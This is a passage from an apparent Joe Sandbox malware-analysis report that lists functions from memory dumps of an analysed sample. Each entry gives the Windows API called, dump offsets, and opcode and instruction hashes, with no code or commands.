                                                                                                                                                                    • Opcode Fuzzy Hash: cff24f816e26c1f55c2e38523203d6fe4ea7c14785655856dba4a7072eb328a0
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D1101B2600204AFEB20CF55CC84FAABBE8EF44324F04846AED04CB642D774E408CBB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFA35A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFA3C0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                    • Opcode ID: 434ffe0da7d002936493868a7681174607231487ca550b75a24d99377d5762f7
                                                                                                                                                                    • Instruction ID: 16a6f8ebc4c7dc1239525ebdd851b316a75fcd60aaa192d9ebde1b905205ac67
                                                                                                                                                                    • Opcode Fuzzy Hash: 434ffe0da7d002936493868a7681174607231487ca550b75a24d99377d5762f7
                                                                                                                                                                    • Instruction Fuzzy Hash: 5311B1B55093809FD7128B25DC45B52BFB4EF42220F0984DBED88CB667C239A858CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 051719AE Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171A04
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CodeExitProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3861947596-0
                                                                                                                                                                    • Opcode ID: 4996b355aa80c7b3e09ad5306d151e088747b84c791445ea6be81e2529430a82
                                                                                                                                                                    • Instruction ID: e378d59b516d13821eb1391e1c49c98908a02779e921a798138303aebe196da0
                                                                                                                                                                    • Opcode Fuzzy Hash: 4996b355aa80c7b3e09ad5306d151e088747b84c791445ea6be81e2529430a82
                                                                                                                                                                    • Instruction Fuzzy Hash: C511E371600244AFEB20CB19DC84FAAB7E8EF44224F04846AED05DB642D778E549CAB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFA986 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FFA9FA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                    • Opcode ID: 914457dd861f53440f1c843e6e2485125506fc973fb7730bddc638c0b5867c38
                                                                                                                                                                    • Instruction ID: f956f7665ecb98a00e8f15d0d95501dfa1f3a1f1532fbff1732af54b88f928a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 914457dd861f53440f1c843e6e2485125506fc973fb7730bddc638c0b5867c38
                                                                                                                                                                    • Instruction Fuzzy Hash: AE2184714087809FDB228F61DC44B52FFF4EF46320F0888DAED898B562D275A458DB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB27E Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB2DD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: 09d5c502d74d2026c27beb5fe0d1c9a42da5f9733aa8f57e94f74ddd0ea792d3
                                                                                                                                                                    • Instruction ID: fc5c3def5dc5bf4217659c15a13dae0304864ed3b2f72533d16e707f1b432938
                                                                                                                                                                    • Opcode Fuzzy Hash: 09d5c502d74d2026c27beb5fe0d1c9a42da5f9733aa8f57e94f74ddd0ea792d3
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C110472500204AFEB21CF51DC44FAAFBE8EF44324F04845AEE448B651D374E419DBB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFAA3A Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetErrorMode.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFAAAC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                    • Opcode ID: 2321b84ba950fbd1c8359337fc0ba393c0f2fae2f816c1637afaee4f3ff75e13
                                                                                                                                                                    • Instruction ID: 364c4b265c256cc626988d0551fd1f04e6a7fe3522aebb62ac9decc6feb8c626
                                                                                                                                                                    • Opcode Fuzzy Hash: 2321b84ba950fbd1c8359337fc0ba393c0f2fae2f816c1637afaee4f3ff75e13
                                                                                                                                                                    • Instruction Fuzzy Hash: F2116D754093C49FDB128B25DC54762BFB4DF47620F0D80DAED848B163D2695908D772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFA432 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,00000E84,?,?), ref: 00FFA4AA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3545744682-0
                                                                                                                                                                    • Opcode ID: d77bcabbd24a3139cc5231d564ddbd9e15e82b3ed143726cd3306e0c8299ae14
                                                                                                                                                                    • Instruction ID: 64a90efcf8f8ac6d4ebaefc4db4d9f1a27baa3357b7e3503718eb86e38edf62d
                                                                                                                                                                    • Opcode Fuzzy Hash: d77bcabbd24a3139cc5231d564ddbd9e15e82b3ed143726cd3306e0c8299ae14
                                                                                                                                                                    • Instruction Fuzzy Hash: E211C4715093846FC311CB26CC45F66FFB4EF86620F08818FE8489BA93D625B919C7A2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 051716B2 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 051716FA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                                    • Opcode ID: f8dea1752cfe00841e375263d625bb693f3786674d585922ab869395ea4192b1
                                                                                                                                                                    • Instruction ID: 802d07bec07ab0d9a877d47f5d7ba5d389cd909c631e69335f1c69bf662a3781
                                                                                                                                                                    • Opcode Fuzzy Hash: f8dea1752cfe00841e375263d625bb693f3786674d585922ab869395ea4192b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 7511A5766002449FDB20CF29D885B66FBE8EF44220F08C4AAED49CB741D774E444CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB1BE Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileType.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB211
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                                    • Opcode ID: 2f9ea932454a2f8b7ce14c5024d023d91951c30655ea9f9f6a19fc06cca881eb
                                                                                                                                                                    • Instruction ID: 41eb53f32ffb1cb22f946e5b9fd2b98c5b261e367579afc6ad3d40160f36f57e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2f9ea932454a2f8b7ce14c5024d023d91951c30655ea9f9f6a19fc06cca881eb
                                                                                                                                                                    • Instruction Fuzzy Hash: B701D676500204AEE721CB16DC85BBAF7D8DF44724F14C096EE058B752D774E849CAB6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 051715EA Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05171636
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Connect
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3144859779-0
                                                                                                                                                                    • Opcode ID: e5866af3de3678b2c741458cb41780e71471b20657755fc78d6f7743bf34548e
                                                                                                                                                                    • Instruction ID: ce9be1e7d98ed10cf1b0b118e157b77a21ed4a5e23df25ed69e1432c9a20032e
                                                                                                                                                                    • Opcode Fuzzy Hash: e5866af3de3678b2c741458cb41780e71471b20657755fc78d6f7743bf34548e
                                                                                                                                                                    • Instruction Fuzzy Hash: 37117C76504204EFDB20CF55D884B66FBF5FF08710F0888AAED898B622D375E458CB66
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFBEBC Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00FFBF10
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2061451462-0
                                                                                                                                                                    • Opcode ID: 6aafe09f8545671128d52c8518f8da223f6e44ab24e04d29b1bc90ef35c5f7fa
                                                                                                                                                                    • Instruction ID: 8d40616cdce6439640566f6ebb62fb202139c33aa6fb15977ab406c50ec1ade9
                                                                                                                                                                    • Opcode Fuzzy Hash: 6aafe09f8545671128d52c8518f8da223f6e44ab24e04d29b1bc90ef35c5f7fa
                                                                                                                                                                    • Instruction Fuzzy Hash: 8D116575409384AFDB128B15DC44B62FFB4DF46624F0880DAED898F263D275A818DB72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171C82 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(?,00000E84,?,?), ref: 05171CD2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FormatMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1306739567-0
                                                                                                                                                                    • Opcode ID: bfb2d19d3283d5be64c6a6ffcb7c6113c34e6be91abebe1d9cb217a026f40920
                                                                                                                                                                    • Instruction ID: 6e8d56fb6ae302fc99e8e55668365446221a72970a4646b8e4711eec16437f71
                                                                                                                                                                    • Opcode Fuzzy Hash: bfb2d19d3283d5be64c6a6ffcb7c6113c34e6be91abebe1d9cb217a026f40920
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F01B172600204ABD310DF16CC45B76FBA8EBC8A20F14811AEC089BB41D735F925CBE5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFA9B6 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FFA9FA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                    • Opcode ID: 8c64c848e14f5d8580c0d0e81985c902ab3ffffb2461c5179b08179838d4771c
                                                                                                                                                                    • Instruction ID: bfc9224e17072344be7afaddf226527aef3cb8e76e23007aefacfdddd2206743
                                                                                                                                                                    • Opcode Fuzzy Hash: 8c64c848e14f5d8580c0d0e81985c902ab3ffffb2461c5179b08179838d4771c
                                                                                                                                                                    • Instruction Fuzzy Hash: A401A172900604DFDB218F51D944B62FBE0EF48320F08C45ADE494B625C37AE458EF62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 051706C2 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,?,?), ref: 05170712
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: 16a3bf6cb62dbb906ba83de062f980ff8991cea352f11b1add38e8153c095993
                                                                                                                                                                    • Instruction ID: b26c6bd3eb92271329cdc6ee21915cf1479738f975297b909d1006c4d27312d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 16a3bf6cb62dbb906ba83de062f980ff8991cea352f11b1add38e8153c095993
                                                                                                                                                                    • Instruction Fuzzy Hash: A501A272500204ABD310DF16CC46B66FBE4FBC9A20F14811AEC089BB41D771F925CBE6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFA38E Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFA3C0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                    • Opcode ID: 22ee0f748c1a9197ed81b7e4326244a1aa8d5cd87ed748144ad51ff313ac1dae
                                                                                                                                                                    • Instruction ID: bc9ab5712888458dcf66b77510b952e08e2df1c236342ec41761b168980f90a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 22ee0f748c1a9197ed81b7e4326244a1aa8d5cd87ed748144ad51ff313ac1dae
                                                                                                                                                                    • Instruction Fuzzy Hash: 2301D4B6A00244CFDB10CF25D885766FBD4DF40320F08C4AADE498B766D279E444DAA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFA45A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,00000E84,?,?), ref: 00FFA4AA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3545744682-0
                                                                                                                                                                    • Opcode ID: 3e49372aeda7f648a625e61f14bd3ed6abe88bc78813c7655ce38b4c337c7cba
                                                                                                                                                                    • Instruction ID: eeb753c3da6601619535f15175ff4d554db0b3e68616f89429e4160433b5779a
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e49372aeda7f648a625e61f14bd3ed6abe88bc78813c7655ce38b4c337c7cba
                                                                                                                                                                    • Instruction Fuzzy Hash: 8801A271500204ABD310DF16CC46B66FBE4FBC9A20F148159EC089BB41D735F925CBE6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFAE7A Relevance: 1.5, APIs: 1, Instructions: 38timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Timer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                                                    • Opcode ID: deb2b5906c8cae6e7d2f7d855a88b3cec99e0d6a5b8dcd84a86a74ceb19d3538
                                                                                                                                                                    • Instruction ID: f9e5cc7f2d0fe8fe04f892994935ce350738367a8b98240f2dbc5f2f98c94330
                                                                                                                                                                    • Opcode Fuzzy Hash: deb2b5906c8cae6e7d2f7d855a88b3cec99e0d6a5b8dcd84a86a74ceb19d3538
                                                                                                                                                                    • Instruction Fuzzy Hash: 4F01A276900244DFDB20CF06D884B65FBE0EF14320F08C09ADE490B662D375E458EBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFBEDE Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00FFBF10
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2061451462-0
                                                                                                                                                                    • Opcode ID: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
                                                                                                                                                                    • Instruction ID: aa000198751dc38697153e0b160f1795d9c23e210fb84e6e7d175bf7a982ff62
                                                                                                                                                                    • Opcode Fuzzy Hash: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF08C769042489FDB108F16D884765FBE0EF44324F08C09ADE494B7A2D379E848DEA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFAA7A Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetErrorMode.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFAAAC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                    • Opcode ID: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
                                                                                                                                                                    • Instruction ID: f9ab2e650f119b019c2f67f4d5c384c510c35c7a839ba0277a44489cefb3b194
                                                                                                                                                                    • Opcode Fuzzy Hash: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0AFB6900248DFDB108F15D984B75FBE0EF44720F08C09ADE494B762E379E848DAA3
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 01132818 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 0113284F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198666097.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1130000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                                    • Opcode ID: 38d094cb4e38bdabe11d394b5eabbfa1700ebfb98208f048f19e596660284091
                                                                                                                                                                    • Instruction ID: a80beac4c798a20c7b012bdf5b6ca27589441556f6961d6dbc029f83d3fa7502
                                                                                                                                                                    • Opcode Fuzzy Hash: 38d094cb4e38bdabe11d394b5eabbfa1700ebfb98208f048f19e596660284091
                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF06D70E013459FCB44DF7988446EEBFF2BB8A218B19857ED449E3615EB349906CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 01132828 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 0113284F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198666097.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1130000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                                    • Opcode ID: fe37792443faf3421100db3bfce4b2fc2f76e50f3737c6819b535b62a2b7ca18
                                                                                                                                                                    • Instruction ID: 54065288966ad864a3661e7e9a79b014b668fa133ad4a6bc2bd06f214170b496
                                                                                                                                                                    • Opcode Fuzzy Hash: fe37792443faf3421100db3bfce4b2fc2f76e50f3737c6819b535b62a2b7ca18
                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF01C70E0021A9F8B58EF7AC84959EBFF6AB89214B11853AD409D3344FB349905CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 011407BC Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: dbeaeff5a6b88fb3730c9fb21e641703a0cc9e1b3e3a6d990314eb5ac02bf3bb
                                                                                                                                                                    • Instruction ID: 3c5e6af733cccfba5cda9f2673ba9ae749450bcc037cb178471096832f03536a
                                                                                                                                                                    • Opcode Fuzzy Hash: dbeaeff5a6b88fb3730c9fb21e641703a0cc9e1b3e3a6d990314eb5ac02bf3bb
                                                                                                                                                                    • Instruction Fuzzy Hash: F811D531604285DFD719CB15C940B65BB91EB8CB08F24C5ACEA490B653C73BD803CA82
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 011405E0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
